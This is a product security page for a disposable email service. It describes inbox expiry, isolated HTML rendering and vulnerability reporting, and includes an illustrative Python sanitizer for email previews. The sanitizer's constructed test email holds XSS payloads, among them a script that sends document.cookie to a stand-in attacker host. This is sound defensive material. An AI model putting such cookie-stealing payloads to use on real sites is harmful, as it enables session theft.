Security at Susmail
Susmail handles untrusted email content, so its security model is deliberately conservative. The service is designed around short-lived receive-only inboxes, limited recovery expectations, cautious rendering, and clear separation between public editorial pages and sensitive inbox or message-reading surfaces.
Short-lived inbox model
Temporary inboxes are meant for low-risk one-time workflows. They are not accounts, permanent mailboxes, or recovery identities. When an inbox expires or is burned, users should assume the address and messages cannot be recovered through product support. This limit is intentional: long recovery windows would make a disposable inbox behave more like a durable mailbox without the account controls users expect from one.
Email content is treated as untrusted
Incoming emails are controlled by third-party senders. Susmail surfaces extracted codes and likely action links for convenience, but users should still check the sender and the surrounding message context before clicking. HTML previews are rendered in an isolated context and remote images are blocked by default, so opening a message does not automatically fetch sender-controlled tracking pixels.
Loading remote images, opening external links, or entering information on another site can expose information to that site. Susmail can reduce some message-open leakage, but it cannot make an external service private or trustworthy.
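The two paragraphs above describe a rendering policy rather than an implementation. The following is an added example of one way to implement that policy; it is not Susmail's code, and the names (`EmailHtmlSanitizer`, `render_preview`, the `track.example`/`app.example` hosts in the constructed sample message) are assumptions made for illustration. It drops active content, strips remote image sources unless the user opts in, neutralises `javascript:` links and inline handlers, collects the surviving `http(s)` links as candidates for an "action link" hint, and wraps the result for an opaque-origin sandboxed iframe with a CSP that forbids fetches as a second layer.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Dropped with their whole subtree: active content, framing, forms, media and anything
# that fetches on its own. HTMLParser discards comments (incl. Outlook conditionals) by default.
DROP = {"script", "style", "title", "iframe", "frame", "frameset", "object", "embed",
        "applet", "link", "meta", "base", "form", "input", "button", "select", "textarea",
        "svg", "math", "template", "video", "audio", "source", "track", "picture"}
UNWRAP = {"html", "head", "body"}                 # keep the children, drop the tag itself
VOID = {"img", "br", "hr", "area", "input", "col", "wbr", "source", "track", "link", "meta",
        "base", "embed"}
SAFE_HREF_SCHEMES = {"http", "https", "mailto"}
BLOCKED_ALT = "[remote image blocked]"

def is_remote_url(url):
    """True for any URL that would cause a network fetch when loaded."""
    url = url.strip()
    return url.startswith("//") or urlsplit(url).scheme.lower() in {"http", "https"}

class EmailHtmlSanitizer(HTMLParser):
    def __init__(self, load_remote_images=False):
        super().__init__()                        # entities become text and are re-escaped
        self.load_remote_images = load_remote_images
        self.out, self.links, self.blocked_images = [], [], 0
        self._skip = 0                            # > 0 while inside a dropped subtree
        self._open_links = []                     # stack of (href, [text]) for link hints

    def _filter_attrs(self, tag, attrs):
        kept = {}
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name in {"background", "srcset", "ping", "formaction"}:
                continue                          # handlers and legacy/alternate fetch attrs
            if name == "style" and any(k in value.lower() for k in ("url(", "@import", "expression(")):
                continue                          # CSS can fetch (and, in old engines, run) too
            if name == "href" and urlsplit(value.strip()).scheme.lower() not in SAFE_HREF_SCHEMES:
                continue                          # javascript:, data:, vbscript:, scheme-less
            if name == "src":
                if tag != "img" or not (is_remote_url(value) or value.strip().lower().startswith("data:image/")):
                    continue                      # only <img>, only http(s) or inline images
                if is_remote_url(value) and not self.load_remote_images:
                    self.blocked_images += 1
                    kept.setdefault("alt", BLOCKED_ALT)   # a real alt= later overrides this
                    continue
            kept[name] = value
        if tag == "a":                            # a sender's page must never reach our window
            kept["target"], kept["rel"] = "_blank", "noopener noreferrer"
        return kept

    def handle_starttag(self, tag, attrs):
        if tag in DROP:
            self._skip += tag not in VOID         # void elements have no end tag to balance
            return
        if self._skip or tag in UNWRAP:
            return
        kept = self._filter_attrs(tag, attrs)
        if tag == "a":
            self._open_links.append((kept.get("href"), []))
        self.out.append("<%s%s>" % (tag, "".join(' %s="%s"' % (k, escape(v)) for k, v in kept.items())))

    def handle_endtag(self, tag):
        if tag in DROP:
            self._skip = max(0, self._skip - (tag not in VOID))
            return
        if self._skip or tag in UNWRAP or tag in VOID:
            return
        if tag == "a" and self._open_links:
            href, parts = self._open_links.pop()
            if href:
                self.links.append((href, " ".join("".join(parts).split())))
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))
            if self._open_links:
                self._open_links[-1][1].append(data)

def render_preview(raw_html, load_remote_images=False):
    """Sanitize an email body and wrap it for an opaque-origin, sandboxed iframe."""
    s = EmailHtmlSanitizer(load_remote_images)
    s.feed(raw_html)
    s.close()
    # Defence in depth: the CSP inside the frame forbids every fetch except the image
    # class the user explicitly opted into, even if the sanitizer missed something.
    csp = ("default-src 'none'; img-src %s; style-src 'unsafe-inline'; form-action 'none'; "
           "base-uri 'none'") % ("https: data:" if load_remote_images else "data:")
    doc = ('<!doctype html><html><head><meta charset="utf-8"><meta http-equiv="Content-Security-Policy" '
           'content="%s"><meta name="referrer" content="no-referrer"></head><body>%s</body></html>'
           % (csp, "".join(s.out)))
    # sandbox="" (no allow-* tokens): opaque origin, no scripts, forms, popups or top
    # navigation; srcdoc keeps the sender's markup off the app's real origin entirely.
    iframe = '<iframe sandbox="" referrerpolicy="no-referrer" srcdoc="%s"></iframe>' % escape(doc)
    return {"iframe": iframe, "blocked_images": s.blocked_images, "links": s.links}

# Constructed sample, not a real message: tracking pixel, javascript: link, inline script,
# remote CSS background, inline event handler and an Outlook conditional comment.
SAMPLE_EMAIL = """<html><head><title>Your code</title>
<style>body{background:url(https://track.example/css.gif)}</style></head><body onload="alert(1)">
<p>Your verification code is <b>482913</b>.</p>
<img src="https://track.example/open.gif?id=abc" width="1" height="1">
<a href="https://app.example/verify?token=abc" style="color:#c00">Verify your email</a>
<a href="javascript:alert(document.cookie)">click me</a>
<script>fetch('https://evil.example/?c=' + document.cookie)</script>
<!--[if mso]><img src="https://track.example/mso.gif"><![endif]--></body></html>"""
```

With the default settings, `render_preview(SAMPLE_EMAIL)` reports one blocked image, keeps only the `https://app.example/verify?...` link as an action-link candidate, and produces markup in which none of the tracking, script or `javascript:` URLs survive; passing `load_remote_images=True` restores the pixel's `src` while the dropped `<style>`, `<script>` and comment content stays gone. The sanitizer is the first line and the frame's `sandbox=""` plus CSP are the second; neither makes the linked external site trustworthy, which is why the link hint still requires the user to read the message context. A production reader would use a maintained allow-list sanitizer rather than a hand-rolled one, but the three controls shown (strip, isolate, restrict fetches) are the ones that matter.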
Advertising and sensitive surfaces
Advertising is not intentionally placed inside temporary inboxes, message readers, HTML email previews, abuse reporting flows, API routes, or operator dashboards. Ads, when configured, are limited to public informational pages such as guides, use cases, comparisons, and the FAQ. This keeps ad code away from uncontrolled third-party email content and empty app states.
Reporting vulnerabilities
If you believe you found a vulnerability in Susmail, contact [email protected]. Include reproduction steps, affected URLs or APIs, expected and actual behavior, and whether the issue may involve message contents, temporary addresses, cookies, or operator-only surfaces.
Please avoid destructive testing, spam, attempts to access data that is not yours, or public disclosure before the issue can be reviewed. Abuse reports involving phishing, malware, or harmful third-party email content should go through the abuse page instead.